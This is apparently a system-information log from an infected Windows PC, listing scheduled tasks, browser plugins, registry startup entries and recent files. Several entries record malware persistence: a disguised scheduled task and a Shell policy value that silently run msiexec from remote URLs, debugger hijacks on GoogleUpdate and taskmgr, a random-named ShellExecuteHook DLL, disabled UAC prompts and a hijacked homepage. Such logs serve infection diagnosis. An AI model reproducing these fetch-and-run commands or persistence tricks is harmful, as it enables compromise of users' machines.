C:\Windows\system32\tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver - %windir%\system32\DFDWiz.exe
C:\Windows\system32\tasks\Microsoft\Windows\DiskCleanup\SilentCleanup - %windir%\system32\cleanmgr.exe /autoclean /d %systemdrive%
C:\Windows\system32\tasks\Microsoft\Windows\DeviceSettings\Prpushnerzes - "msiexec" /i hTTp://D2bUH1bF1g584W.clOuDfroNt.net/mm ... d=20170528 /q
C:\Windows\system32\tasks\Microsoft\Windows\Defrag\ScheduledDefrag - %windir%\system32\defrag.exe -c -h -o -$
C:\Windows\system32\tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator - %SystemRoot%\System32\wsqmcons.exe
C:\Windows\system32\tasks\Microsoft\Windows\Customer Experience Improvement Program\Uploader - %windir%\system32\WSqmCons.exe -u
C:\Windows\system32\tasks\Microsoft\Windows\Bluetooth\UninstallDeviceTask - BthUdTask.exe $(Arg0)
C:\Windows\system32\tasks\Microsoft\Windows\Autochk\Proxy - %windir%\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations
C:\Windows\system32\tasks\Microsoft\Windows\AppxDeploymentClient\Pre-staged app cleanup - %windir%\system32\rundll32.exe %windir%\system32\AppxDeploymentClient.dll,AppxPreStageCleanupRunTask
C:\Windows\system32\tasks\Microsoft\Windows\ApplicationData\CleanupTemporaryState - %windir%\system32\rundll32.exe Windows.Storage.ApplicationData.dll,CleanupTemporaryState
C:\Windows\system32\tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser - %windir%\system32\compattel\DiagTrackRunner.exe /UploadEtlFilesOnly
C:\Windows\system32\tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater - %windir%\system32\rundll32.exe %windir%\system32\invagent.dll,RunUpdate
C:\Windows\system32\tasks\Microsoft\Windows\Application Experience\StartupAppTask - %windir%\system32\rundll32.exe Startupscan.dll,SusRunTask
C:\Windows\system32\tasks\Microsoft\Windows\AppID\PolicyConverter - %windir%\system32\appidpolicyconverter.exe
C:\Windows\system32\tasks\Microsoft\Windows\AppID\VerifiedPublisherCertStoreCheck - %windir%\system32\appidcertstorecheck.exe
C:\Windows\system32\tasks\AVAST Software\Avast settings backup - C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe /backup /iavs

=========Mozilla firefox=========

ProfilePath - C:\Users\GIGABYTE\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1

prefs.js - "browser.search.useDBForOrder" - true
prefs.js - "browser.startup.homepage" - "http://www.initialpage123.com/?z=baeca7 ... 11&type=hp"

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 26.0.0.137 Plugin
"Path"=C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_26_0_0_137.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5]
"Description"=Intel IPT WebApi plugin
"Path"=C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater]
"Description"=This plugin updates Intel WebAPI component
"Path"=C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@java.com/DTPlugin,version=11.131.2]
"Description"=Java™ Deployment Toolkit
"Path"=C:\Program Files (x86)\Java\jre1.8.0_131\bin\dtplugin\npDeployJava1.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@java.com/JavaPlugin,version=11.131.2]
"Description"=Oracle® Next Generation Java™ Plug-In
"Path"=C:\Program Files (x86)\Java\jre1.8.0_131\bin\plugin2\npjp2.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0]
"Description"=Ag Player Plugin
"Path"=C:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0]
"Description"=Office Authorization plug-in for NPAPI browsers
"Path"=C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/SharePoint,version=14.0]
"Description"=Microsoft SharePoint Plug-in for Firefox
"Path"=C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@nvidia.com/3DVision]
"Description"=NVIDIA stereo images plugin for Mozilla browsers
"Path"=C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@nvidia.com/3DVisionStreaming]
"Description"=NVIDIA 3D Vision Streaming plugin for Mozilla browsers
"Path"=C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@perfectworld.com/npArcPlayNowPlugin]
"Description"=PlayNow plugin for Mozilla browsers
"Path"=D:\plugins\npArcPluginFF.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Description"=globalUpdate Update
"Path"=C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\npglobalupdateUpdate4.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Description"=globalUpdate Update
"Path"=C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\npglobalupdateUpdate4.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.1.5]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.4]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.6]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\Adobe Reader]
"Description"=Handles PDFs in-place in Firefox
"Path"=C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll


[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 26.0.0.137 Plugin
"Path"=C:\Windows\system32\Macromed\Flash\NPSWF64_26_0_0_137.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0]
"Description"=Ag Player Plugin
"Path"=C:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0]
"Description"=Office Authorization plug-in for NPAPI browsers
"Path"=C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL


C:\Users\GIGABYTE\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\
{2d3fbcf7-be69-4433-8858-c621a8d0e58d}
{ea614400-e918-4741-9a97-7a972ff7c30b}

C:\Users\GIGABYTE\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\
0u8ha2gg.xml
7071285EEB18.xml
nice.xml
seznam-avast.xml

C:\Users\GIGABYTE\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\addons.json
Seznam lištička - extension - {ea614400-e918-4741-9a97-7a972ff7c30b}

C:\Users\GIGABYTE\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\pluginreg.dat
Plugin - Adobe Acrobat - 15.23.20053.15062 - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll
Plugin - VLC Web Plugin - 2.2.2.0 - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
Plugin - Google Update - 1.3.32.7 - C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll
Plugin - ArcPlugin - 1.0.0.1 - D:\plugins\npArcPluginFF.dll
Plugin - NVIDIA 3D VISION - 7.17.13.5354 - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll
Plugin - NVIDIA 3D Vision - 7.17.13.5354 - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll
Plugin - Microsoft Office 2010 - 14.0.4730.1010 - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL
Plugin - Microsoft Office 2010 - 14.0.4761.1000 - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL
Plugin - Silverlight Plug-In - 5.1.50901.0 - C:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll
Plugin - Java(TM) Platform SE 8 U111 - 11.111.2.14 - C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll
Plugin - Java Deployment Toolkit 8.0.1110.14 - 11.111.2.14 - C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npdeployJava1.dll
Plugin - Intel® Identity Protection Technology - 4.0.5.0 - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
Plugin - Intel® Identity Protection Technology - 4.0.5.0 - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
Plugin - Shockwave Flash - 24.0.0.194 - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_24_0_0_194.dll
Plugin - Unity Player - 5.3.2.31412 - C:\Users\GIGABYTE\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll
Plugin - Roblox Launcher Plugin - 1.2.8.25 - C:\Users\GIGABYTE\AppData\Local\Roblox\Versions\version-8756646edb404aaf\NPRobloxProxy.dll
Plugin - mycomgames3 component npmycomdetector.dll - 3.0.168.32465 - C:\Users\GIGABYTE\AppData\Local\MyComGames\npmycomdetector.dll

=========Google Chrome=========


[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\daanglpcpkjjlkhcbladppjphglbigam]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\eofcbnmajmjmplflapaojjnihcjkigck]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\gomekmidlodglbbmalcneegieacbdmki]
"Path"=C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx


======Registry dump ======


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"={33BB0A4E-99AF-4226-BDF6-49120163DE86}
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"URL"=http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL"=http://www.bing.com/search?q={searchTer ... DF&pc=MSE1


[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"={33BB0A4E-99AF-4226-BDF6-49120163DE86}
[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"URL"=http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Internet Explorer\SearchScopes\{15C4DF55-4B67-495A-A3D3-A497C4A49EE0}]
"URL"=http://search.seznam.cz/?sourceid=quick ... earchTerms}
[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL"=http://www.bing.com/search?q={searchTer ... DF&pc=MSE1

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0F4B8786-5502-4803-8EBC-F652A1153BB6}]
True Key Helper - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie64.dll [2017-06-26 1429728]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{449D0D6E-2412-4E61-B68F-1CB625CD9E52}]
ExplorerBHO Class - C:\Program Files\Classic Shell\ClassicExplorer64.dll [2014-04-20 803520]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-07-04 896048]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF}]
Office Document Cache Handler - C:\PROGRA~1\MICROS~1\Office14\URLREDIR.DLL [2013-03-06 690392]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0F4B8786-5502-4803-8EBC-F652A1153BB6}]
True Key Helper - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll [2017-06-26 1056992]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{449D0D6E-2412-4E61-B68F-1CB625CD9E52}]
ExplorerBHO Class - C:\Program Files\Classic Shell\ClassicExplorer32.dll [2014-04-20 683200]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{656e2a25-8226-470b-9a67-b2a60f657630}]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files (x86)\Java\jre1.8.0_131\bin\ssv.dll [2017-06-21 473152]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{84BFE29A-8139-402a-B2A4-C23AE9E1A75F}]
ArcPluginIEBHO Class - D:\plugins\ArcPluginIE.dll []

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-07-04 774440]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF}]
Office Document Cache Handler - C:\PROGRA~2\MICROS~1\Office14\URLREDIR.DLL [2013-03-06 562904]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files (x86)\Java\jre1.8.0_131\bin\jp2ssv.dll [2017-06-21 186944]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
{553891B7-A0D5-4526-BE18-D3CE461D6310} - Classic Explorer Bar - C:\Program Files\Classic Shell\ClassicExplorer64.dll [2014-04-20 803520]
{4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - True Key - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie64.dll [2017-06-26 1429728]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Internet Explorer\Toolbar]
{553891B7-A0D5-4526-BE18-D3CE461D6310} - Classic Explorer Bar - C:\Program Files\Classic Shell\ClassicExplorer32.dll [2014-04-20 683200]
{4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - True Key - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll [2017-06-26 1056992]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"=C:\Windows\system32\igfxtray.exe [2015-03-31 392592]
"HotKeysCmds"=C:\Windows\system32\hkcmd.exe []
"Persistence"=C:\Windows\system32\igfxpers.exe []
"RTHDVCPL"=C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2013-10-24 13662936]
"IAStorIcon"=C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIconLaunch.exe [2013-08-07 36352]
"Classic Start Menu"=C:\Program Files\Classic Shell\ClassicStartMenu.exe [2014-04-20 161984]
"AvastUI.exe"=C:\Program Files\AVAST Software\Avast\AvLaunch.exe [2017-07-04 213832]
"NvBackend"=C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2015-07-24 2634896]
"ShadowPlay"=C:\Windows\system32\nvspcap64.dll [2015-07-24 1710568]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Steam"=D:\Steam\steam.exe [2017-07-18 3062560]
"cz.seznam.software.autoupdate"=C:\Users\GIGABYTE\AppData\Roaming\Seznam.cz\szninstall.exe [2013-05-16 1062472]
"cz.seznam.software.szndesktop"=C:\Users\GIGABYTE\AppData\Roaming\Seznam.cz\bin\wszndesktop.exe [2015-05-26 103080]
"MyAdBlocker"=C:\Program Files (x86)\My Ad Blocker\AdBlocker.exe [2006-03-17 802816]
"uTorrent"=C:\Users\GIGABYTE\AppData\Roaming\uTorrent\utorrent.exe [2015-02-22 416168]
"MyComGames"=C:\Users\GIGABYTE\AppData\Local\MyComGames\MyComGames.exe [2017-07-14 5519760]
"Gaijin.Net Agent"=C:\Users\GIGABYTE\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe [2017-06-28 2010056]
"World of Tanks"=C:\Games\World_of_Tanks\WargamingGameUpdater.exe []
"background_fault"=C:\Users\GIGABYTE\AppData\Local\background_fault\aswRD.exe [2017-05-04 1419576]
"CCleaner Monitoring"=C:\Program Files\CCleaner\CCleaner64.exe [2016-04-15 8698584]
"DAEMON Tools Lite"=C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe [2011-01-20 1305408]
"World of Tanks (1)"=D:\Games\WargamingGameUpdater.exe []

[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"seznam-listicka-distribuce"=C:\Program Files (x86)\Seznam.cz\distribution\szninstall.exe [2013-05-16 1062472]
"VirtualCloneDrive"=C:\Program Files (x86)\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe [2013-03-10 88984]
"Arc"=D:\ArcLauncher.exe /autorun []
"SunJavaUpdateSched"=C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2017-03-15 587288]

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
TP-LINK Wireless Configuration Utility.lnk - C:\Program Files (x86)\TP-LINK\TP-LINK Wireless Configuration Utility\TWCU.exe

C:\Users\GIGABYTE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
MEGAsync.lnk - C:\ProgramData\MEGAsync\MEGAsync.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\igfxcui]
igfxdev.dll []

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{234628B4-4048-11E7-9F2C-64006A5CFC23}"=C:\Users\GIGABYTE\AppData\Roaming\Grerdaentlerveck\Thuvale.dll [2017-05-28 144384]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"notification packages" = scecli
"C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"Shell"=explorer.exe,msiexec.exe /i http://point.ltdmsjq.com/?data=zDlkMj85 ... YdMYM2NH== /q

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=0
"SoftwareSASGeneration"=1

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"EnableShellExecuteHooks"=1

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe]
"Debugger" = 324095823984.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdaterService.exe]
"Debugger" = 8736459873644.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe]
"Debugger" =


[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
"StubPath" = "C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.96\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"vidc.yuy2"=msyuv.dll
"vidc.i420"=iyuv_32.dll
"msacm.msgsm610"=msgsm32.acm
"msacm.msg711"=msg711.acm
"vidc.yvyu"=msyuv.dll
"vidc.yvu9"=tsbyuv.dll
"wavemapper"=msacm32.drv
"midimapper"=midimap.dll
"vidc.uyvy"=msyuv.dll
"vidc.iyuv"=iyuv_32.dll
"vidc.mrle"=msrle32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msadpcm"=msadp32.acm
"vidc.msvc"=msvidc32.dll
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"aux1"=wdmaud.drv
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv
"wave2"=wdmaud.drv
"midi2"=wdmaud.drv
"mixer2"=wdmaud.drv
"wave3"=wdmaud.drv
"midi3"=wdmaud.drv
"mixer3"=wdmaud.drv
"wave5"=wdmaud.drv
"midi5"=wdmaud.drv
"mixer5"=wdmaud.drv
"wave4"=wdmaud.drv
"midi4"=wdmaud.drv
"mixer4"=wdmaud.drv

====== File associations ======

.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*

====== List of files/folders created in the last 1 month ======

2017-07-22 19:33:04 ----D---- C:\rsit
2017-07-22 19:33:04 ----D---- C:\Program Files\trend micro
2017-07-20 09:36:31 ----D---- C:\Users\GIGABYTE\AppData\Roaming\NVIDIA
2017-07-18 09:41:42 ----A---- C:\Windows\SYSWOW64\nvspcap.dll
2017-07-18 09:41:42 ----A---- C:\Windows\SYSWOW64\nvspbridge.dll
2017-07-18 09:41:42 ----A---- C:\Windows\system32\nvspcap64.dll
2017-07-18 09:41:42 ----A---- C:\Windows\system32\nvspbridge64.dll
2017-07-18 09:40:03 ----D---- C:\Windows\LastGood
2017-07-18 09:39:37 ----A---- C:\Windows\SYSWOW64\nvStreaming.exe
2017-07-18 09:39:34 ----D---- C:\ProgramData\NVIDIA
2017-07-18 09:39:25 ----A---- C:\Windows\system32\nvvsvc.exe
2017-07-18 09:39:25 ----A---- C:\Windows\system32\nvsvcr.dll
2017-07-18 09:39:25 ----A---- C:\Windows\system32\nvsvc64.dll
2017-07-18 09:39:25 ----A---- C:\Windows\system32\nvshext.dll
2017-07-18 09:39:25 ----A---- C:\Windows\system32\nvmctray.dll
2017-07-18 09:39:25 ----A---- C:\Windows\system32\nvcpl.dll
2017-07-18 09:39:18 ----D---- C:\temp
2017-07-18 09:31:19 ----A---- C:\Windows\SYSWOW64\nvaudcap32v.dll
2017-07-18 09:31:19 ----A---- C:\Windows\system32\nvaudcap64v.dll
2017-07-18 09:31:19 ----A---- C:\Windows\system32\drivers\nvvad64v.sys
2017-07-18 09:31:18 ----A---- C:\Windows\system32\SET5748.tmp
2017-07-18 09:31:18 ----A---- C:\Windows\system32\nvhdagenco6420103.dll
2017-07-18 09:31:17 ----A---- C:\Windows\system32\SET4CE2.tmp
2017-07-18 09:31:17 ----A---- C:\Windows\system32\SET4697.tmp
2017-07-18 09:31:17 ----A---- C:\Windows\system32\nvwgf2umx.dll
2017-07-18 09:31:17 ----A---- C:\Windows\system32\nvumdshimx.dll
2017-07-18 09:31:16 ----A---- C:\Windows\system32\nvdispgenco6435362.dll
2017-07-18 09:31:16 ----A---- C:\Windows\system32\nvdispco6435362.dll
2017-07-18 09:31:13 ----A---- C:\Windows\system32\SET149B.tmp
2017-07-18 09:31:13 ----A---- C:\Windows\system32\nvapi64.dll
2017-07-18 09:21:13 ----D---- C:\Windows\LastGood.Tmp
2017-07-12 04:14:25 ----A---- C:\Windows\system32\mshtml.dll
2017-07-12 04:14:24 ----A---- C:\Windows\system32\jscript9.dll
2017-07-12 04:14:23 ----A---- C:\Windows\SYSWOW64\mshtml.dll
2017-07-12 04:14:22 ----A---- C:\Windows\SYSWOW64\jscript9.dll
2017-07-12 04:14:21 ----A---- C:\Windows\SYSWOW64\tquery.dll
2017-07-12 04:14:21 ----A---- C:\Windows\system32\win32k.sys
2017-07-12 04:14:21 ----A---- C:\Windows\system32\tquery.dll
2017-07-12 04:14:20 ----A---- C:\Windows\SYSWOW64\mssrch.dll
2017-07-12 04:14:20 ----A---- C:\Windows\system32\ieframe.dll
2017-07-12 04:14:19 ----A---- C:\Windows\SYSWOW64\msxml3.dll
2017-07-12 04:14:19 ----A---- C:\Windows\system32\urlmon.dll
2017-07-12 04:14:19 ----A---- C:\Windows\system32\ntoskrnl.exe
2017-07-12 04:14:19 ----A---- C:\Windows\system32\msxml3.dll
2017-07-12 04:14:19 ----A---- C:\Windows\system32\mssrch.dll
2017-07-12 04:14:19 ----A---- C:\Windows\system32\kerberos.dll
2017-07-12 04:14:18 ----A---- C:\Windows\SYSWOW64\urlmon.dll
2017-07-12 04:14:18 ----A---- C:\Windows\SYSWOW64\kerberos.dll
2017-07-12 04:14:18 ----A---- C:\Windows\SYSWOW64\ieframe.dll
2017-07-12 04:14:18 ----A---- C:\Windows\system32\winresume.exe
2017-07-12 04:14:18 ----A---- C:\Windows\system32\drivers\ntfs.sys
2017-07-12 04:14:17 ----A---- C:\Windows\system32\winload.exe
2017-07-12 04:14:17 ----A---- C:\Windows\system32\drivers\http.sys
2017-07-12 04:14:17 ----A---- C:\Windows\system32\certutil.exe
2017-07-12 04:14:17 ----A---- C:\Windows\system32\autoconv.exe
2017-07-12 04:14:16 ----A---- C:\Windows\SYSWOW64\vbscript.dll
2017-07-12 04:14:16 ----A---- C:\Windows\SYSWOW64\untfs.dll
2017-07-12 04:14:16 ----A---- C:\Windows\SYSWOW64\certutil.exe
2017-07-12 04:14:16 ----A---- C:\Windows\SYSWOW64\autoconv.exe
2017-07-12 04:14:16 ----A---- C:\Windows\system32\vbscript.dll
2017-07-12 04:14:16 ----A---- C:\Windows\system32\uReFS.dll
2017-07-12 04:14:16 ----A---- C:\Windows\system32\untfs.dll
2017-07-12 04:14:15 ----A---- C:\Windows\SYSWOW64\uReFS.dll
2017-07-12 04:14:15 ----A---- C:\Windows\system32\termsrv.dll
2017-07-12 04:14:15 ----A---- C:\Windows\system32\srvsvc.dll
2017-07-12 04:14:15 ----A---- C:\Windows\system32\drivers\clfs.sys
2017-07-12 04:14:14 ----A---- C:\Windows\system32\wininet.dll
